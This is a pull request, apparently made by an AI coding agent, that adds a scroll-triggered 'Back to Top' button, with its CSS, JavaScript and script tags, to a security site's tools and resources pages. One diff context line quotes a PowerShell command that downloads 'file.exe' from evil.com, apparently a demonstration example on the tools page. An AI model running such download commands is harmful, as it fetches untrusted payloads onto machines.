### PR TITLE
🎨 Palette: Add Back to Top button

### DIFF
--- a/.Jules/palette.md
+++ b/.Jules/palette.md
@@ -17,3 +17,7 @@
 ## 2024-05-24 - Global Keyboard Shortcuts Safety
 **Learning:** When implementing global hotkeys (like '/' for search), naive implementations can break typing in other input fields if they don't explicitly check document.activeElement.tagName.
 **Action:** Always wrap global keydown listeners with a check: if (activeTag !== 'INPUT' && activeTag !== 'TEXTAREA').
+
+## 2026-02-14 - Invisible Navigation Aids
+**Learning:** Users on long content pages often struggle to return to the top navigation without excessive scrolling, causing friction.
+**Action:** Implement unobtrusive "Back to Top" buttons that only appear after scrolling, maintaining a clean UI until the functionality is needed.

--- a/css/style.css
+++ b/css/style.css
@@ -770,6 +770,40 @@ fieldset.filter-chips {
     font-weight: 700;
 }
 
+/* ===== Back to Top Button ===== */
+.back-to-top {
+    position: fixed;
+    bottom: 2rem;
+    right: 2rem;
+    background-color: var(--accent-color);
+    color: var(--bg-color);
+    width: 3rem;
+    height: 3rem;
+    border-radius: 50%;
+    border: none;
+    box-shadow: 0 4px 12px var(--shadow-color);
+    display: flex;
+    align-items: center;
+    justify-content: center;
+    cursor: pointer;
+    opacity: 0;
+    visibility: hidden;
+    transition: opacity 0.3s, visibility 0.3s, transform 0.2s;
+    z-index: 1000;
+    font-size: 1.5rem;
+    padding: 0;
+}
+
+.back-to-top.visible {
+    opacity: 1;
+    visibility: visible;
+}
+
+.back-to-top:hover {
+    transform: translateY(-4px);
+    opacity: 0.9;
+}
+
 /* ===== Print-Friendly Styles ===== */
 @media print {
     * {
@@ -798,6 +832,7 @@ fieldset.filter-chips {
     .button-container,
     .clear-button,
     .copy-btn,
+    .back-to-top,
     .checklist-reset,
     footer {
         display: none !important;

--- a/js/ui.js
+++ b/js/ui.js
@@ -1,0 +1,22 @@
+document.addEventListener('DOMContentLoaded', () => {
+    if (document.querySelector('.back-to-top')) return;
+
+    const btn = document.createElement('button');
+    btn.className = 'back-to-top';
+    btn.innerHTML = '↑';
+    btn.setAttribute('aria-label', 'Back to top');
+    document.body.appendChild(btn);
+
+    const toggleVisible = () => {
+        if (window.scrollY > 300) {
+            btn.classList.add('visible');
+        } else {
+            btn.classList.remove('visible');
+        }
+    };
+
+    window.addEventListener('scroll', toggleVisible);
+    btn.addEventListener('click', () => {
+        window.scrollTo({ top: 0, behavior: 'smooth' });
+    });
+});

--- a/resources.html
+++ b/resources.html
@@ -372,6 +372,7 @@
     <p>&copy; Zero Trust. Hosted on GitHub Pages. | <a href="privacy.html">Privacy Policy</a></p>
   </footer>
 
+  <script src="js/ui.js" defer></script>
   <script src="js/highlight.js"></script>
   <script>
     const searchInput = document.getElementById('resourceSearch');

--- a/tools.html
+++ b/tools.html
@@ -323,6 +323,7 @@ Invoke-WebRequest -Uri "http://evil.com/file.exe" -OutFile "C:\Temp\file.exe"
     <p>&copy; Zero Trust. Hosted on GitHub Pages. | <a href="privacy.html">Privacy Policy</a></p>
   </footer>
 
+  <script src="js/ui.js" defer></script>
   <script src="js/highlight.js"></script>
   <script>
     const searchInput = document.getElementById('searchInput');


### PR DESCRIPTION
💡 **What:** Added a floating "Back to Top" button that appears when scrolling down on long pages (`tools.html`, `resources.html`).
🎯 **Why:** Users on lengthy content pages often struggle to return to the top navigation without excessive scrolling.
📸 **Before/After:** The button is hidden by default and smoothly fades in after scrolling 300px.
♿ **Accessibility:** The button is keyboard focusable when visible, has an appropriate `aria-label`, and uses high-contrast colors from the theme.

---
*PR created automatically by Jules for task [11501804699612548119](https://jules.google.com/task/11501804699612548119) started by @PietjePuh*